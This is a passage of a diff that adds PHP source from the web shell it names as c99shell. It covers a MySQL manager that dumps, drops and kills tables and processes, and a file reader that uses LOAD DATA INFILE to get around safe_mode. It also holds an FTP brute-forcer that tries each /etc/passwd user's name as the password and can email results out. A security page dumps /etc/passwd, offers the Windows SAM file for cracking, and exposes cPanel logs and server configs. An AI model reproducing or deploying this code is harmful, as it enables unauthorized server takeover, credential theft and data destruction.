+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; 
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; 
+     echo "</form>"; 
+    } 
+    else 
+    { 
+     $diplay = TRUE; 
+     $set = array(); 
+     $set["sock"] = $sql_sock; 
+     $set["db"] = $sql_db; 
+     $dump_out = "download"; 
+     $set["print"] = 0; 
+     $set["nl2br"] = 0; 
+     $set[""] = 0; 
+     $set["file"] = $dump_file; 
+     $set["add_drop"] = TRUE; 
+     $set["onlytabs"] = array(); 
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} 
+     $ret = mysql_dump($set); 
+     if ($sql_dump_download) 
+     { 
+      @ob_clean(); 
+      header("Content-type: application/octet-stream"); 
+      header("Content-length: ".strlen($ret)); 
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
+      echo $ret; 
+      exit; 
+     } 
+     elseif ($sql_dump_savetofile) 
+     { 
+      $fp = fopen($sql_dump_file,"w"); 
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} 
+      else 
+      { 
+       fwrite($fp,$ret); 
+       fclose($fp); 
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; 
+      } 
+     } 
+     else {echo "<b>Dump: nothing to do!</b>";} 
+    } 
+   } 
+   if ($diplay) 
+   { 
+    if (!empty($sql_tbl)) 
+    { 
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} 
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); 
+     $count_row = mysql_fetch_array($count); 
+     mysql_free_result($count); 
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); 
+     $tbl_struct_fields = array(); 
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} 
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} 
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} 
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} 
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} 
+     $perpage = $sql_tbl_le - $sql_tbl_ls; 
+     if (!is_numeric($perpage)) {$perpage = 10;} 
+     $numpages = $count_row[0]/$perpage; 
+     $e = explode(" ",$sql_order); 
+     if (count($e) == 2) 
+     { 
+      if ($e[0] == "d") {$asc_desc = "DESC";} 
+      else {$asc_desc = "ASC";} 
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; 
+     } 
+     else {$v = "";} 
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; 
+     $result = mysql_query($query) or print(mysql_smarterror()); 
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} 
+     if ($sql_tbl_act == "insert") 
+     { 
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} 
+      if (!empty($sql_tbl_insert_radio)) 
+      { 
+
+      } 
+      else 
+      { 
+       echo "<br><br><b>Inserting row into table:</b><br>"; 
+       if (!empty($sql_tbl_insert_q)) 
+       { 
+        $sql_query = "SELECT * FROM `".$sql_tbl."`"; 
+        $sql_query .= " WHERE".$sql_tbl_insert_q; 
+        $sql_query .= " LIMIT 1;"; 
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); 
+        $values = mysql_fetch_assoc($result); 
+        mysql_free_result($result); 
+       } 
+       else {$values = array();} 
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; 
+       foreach ($tbl_struct_fields as $field) 
+       { 
+        $name = $field["Field"]; 
+        if (empty($sql_tbl_insert_q)) {$v = "";} 
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; 
+        $i++; 
+       } 
+       echo "</table><br>"; 
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; 
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} 
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; 
+      } 
+     } 
+     if ($sql_tbl_act == "browse") 
+     { 
+      $sql_tbl_ls = abs($sql_tbl_ls); 
+      $sql_tbl_le = abs($sql_tbl_le); 
+      echo "<hr size=\"1\" noshade>"; 
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; 
+      $b = 0; 
+      for($i=0;$i<$numpages;$i++) 
+      { 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} 
+       echo $i; 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} 
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} 
+       else {echo "&nbsp;";} 
+      } 
+      if ($i == 0) {echo "empty";} 
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>"; 
+      echo "<tr>"; 
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; 
+      for ($i=0;$i<mysql_num_fields($result);$i++) 
+      { 
+       $v = mysql_field_name($result,$i); 
+       if ($e[0] == "a") {$s = "d"; $m = "asc";} 
+       else {$s = "a"; $m = "desc";} 
+       echo "<td>"; 
+       if (empty($e[0])) {$e[0] = "a";} 
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} 
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} 
+       echo "</td>"; 
+      } 
+      echo "<td><font color=\"green\"><b>Action</b></font></td>"; 
+      echo "</tr>"; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       echo "<tr>"; 
+       $w = ""; 
+       $i = 0; 
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} 
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} 
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; 
+       $i = 0; 
+       foreach ($row as $k=>$v) 
+       { 
+        $v = htmlspecialchars($v); 
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";} 
+        echo "<td>".$v."</td>"; 
+        $i++; 
+       } 
+       echo "<td>"; 
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; 
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; 
+       echo "</td>"; 
+       echo "</tr>"; 
+      } 
+      mysql_free_result($result); 
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"deleterow\">Delete</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+     } 
+    } 
+    else 
+    { 
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock); 
+     if (!$result) {echo mysql_smarterror();} 
+     else 
+     { 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; 
+      $i = 0; 
+      $tsize = $trows = 0; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       $tsize += $row["Data_length"]; 
+       $trows += $row["Rows"]; 
+       $size = view_size($row["Data_length"]); 
+       echo "<tr>"; 
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; 
+       echo "<td>".$row["Rows"]."</td>"; 
+       echo "<td>".$row["Type"]."</td>"; 
+       echo "<td>".$row["Create_time"]."</td>"; 
+       echo "<td>".$row["Update_time"]."</td>"; 
+       echo "<td>".$size."</td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; 
+       echo "</tr>"; 
+       $i++; 
+      } 
+      echo "<tr bgcolor=\"000000\">"; 
+      echo "<td><center><b>+</b></center></td>"; 
+      echo "<td><center><b>".$i." table(s)</b></center></td>"; 
+      echo "<td><b>".$trows."</b></td>"; 
+      echo "<td>".$row[1]."</td>"; 
+      echo "<td>".$row[10]."</td>"; 
+      echo "<td>".$row[11]."</td>"; 
+      echo "<td><b>".view_size($tsize)."</b></td>"; 
+      echo "<td></td>"; 
+      echo "</tr>"; 
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"tbldrop\">Drop</option>"; 
+      echo "<option value=\"tblempty\">Empty</option>"; 
+      echo "<option value=\"tbldump\">Dump</option>"; 
+      echo "<option value=\"tblcheck\">Check table</option>"; 
+      echo "<option value=\"tbloptimize\">Optimize table</option>"; 
+      echo "<option value=\"tblrepair\">Repair table</option>"; 
+      echo "<option value=\"tblanalyze\">Analyze table</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+      mysql_free_result($result); 
+     } 
+    } 
+   } 
+   } 
+  } 
+  else 
+  { 
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile"); 
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } 
+   if (!empty($sql_act)) 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if ($sql_act == "newdb") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} 
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+    } 
+    if ($sql_act == "serverstatus") 
+    { 
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "servervars") 
+    { 
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "processes") 
+    { 
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} 
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "getfile") 
+    { 
+     $tmpdb = $sql_login."_tmpdb"; 
+     $select = mysql_select_db($tmpdb); 
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} 
+     if ($select) 
+     { 
+      $created = FALSE; 
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); 
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); 
+      $result = mysql_query("SELECT * FROM tmp_file;"); 
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} 
+      else 
+      { 
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} 
+       $f = ""; 
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} 
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} 
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} 
+       mysql_free_result($result); 
+       mysql_query("DROP TABLE tmp_file;"); 
+      } 
+     } 
+     mysql_drop_db($tmpdb); //comment it if you want to leave database 
+    } 
+   } 
+  } 
+ } 
+ echo "</td></tr></table>"; 
+ if ($sql_sock) 
+ { 
+  $affected = @mysql_affected_rows($sql_sock); 
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} 
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; 
+ } 
+ echo "</table>"; 
+} 
+if ($act == "mkdir") 
+{ 
+ if ($mkdir != $d) 
+ { 
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} 
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} 
+  echo "<br><br>"; 
+ } 
+ $act = $dspact = "ls"; 
+} 
+if ($act == "ftpquickbrute") 
+{ 
+ echo "<b>Ftp Quick brute:</b><br>"; 
+ if (!win) {echo "This functions not work in Windows!<br><br>";} 
+ else 
+ { 
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) 
+  { 
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} 
+   else {$TRUE = TRUE;} 
+   if ($TRUE) 
+   { 
+    $sock = @ftp_connect($host,$port,$timeout); 
+    if (@ftp_login($sock,$login,$pass)) 
+    { 
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; 
+     ob_flush(); 
+     return TRUE; 
+    } 
+   } 
+  } 
+  if (!empty($submit)) 
+  { 
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} 
+   $fp = fopen("/etc/passwd","r"); 
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";} 
+   else 
+   { 
+    if ($fqb_logging) 
+    { 
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} 
+     else {$fqb_logfp = FALSE;} 
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; 
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    } 
+    ob_flush(); 
+    $i = $success = 0; 
+    $ftpquick_st = getmicrotime(); 
+    while(!feof($fp)) 
+    { 
+     $str = explode(":",fgets($fp,2048)); 
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) 
+     { 
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; 
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; 
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+      $success++; 
+      ob_flush(); 
+     } 
+     if ($i > $fqb_lenght) {break;} 
+     $i++; 
+    } 
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} 
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; 
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; 
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} 
+    fclose($fqb_logfp); 
+   } 
+  } 
+  else 
+  { 
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; 
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; 
+  } 
+ } 
+} 
+if ($act == "d") 
+{ 
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} 
+ else 
+ { 
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; 
+  if (!$win) 
+  { 
+   echo "<tr><td><b>Owner/Group</b></td><td> "; 
+   $ow = posix_getpwuid(fileowner($d)); 
+   $gr = posix_getgrgid(filegroup($d)); 
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); 
+  } 
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; 
+ } 
+} 
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} 
+if ($act == "security") 
+{ 
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; 
+ if (!$win) 
+ { 
+  if ($nixpasswd) 
+  { 
+   if ($nixpasswd == 1) {$nixpasswd = 0;} 
+   echo "<b>*nix /etc/passwd:</b><br>"; 
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} 
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; 
+   $i = $nixpwd_s; 
+   while ($i < $nixpwd_e) 
+   { 
+    $uid = posix_getpwuid($i); 
+    if ($uid) 
+    { 
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; 
+     echo join(":",$uid)."<br>"; 
+    } 
+    $i++; 
+   } 
+  } 
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} 
+ } 
+ else 
+ { 
+  $v = $_SERVER["WINDIR"]."\repair\sam"; 
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} 
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</font></b><br>";} 
+ } 
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} 
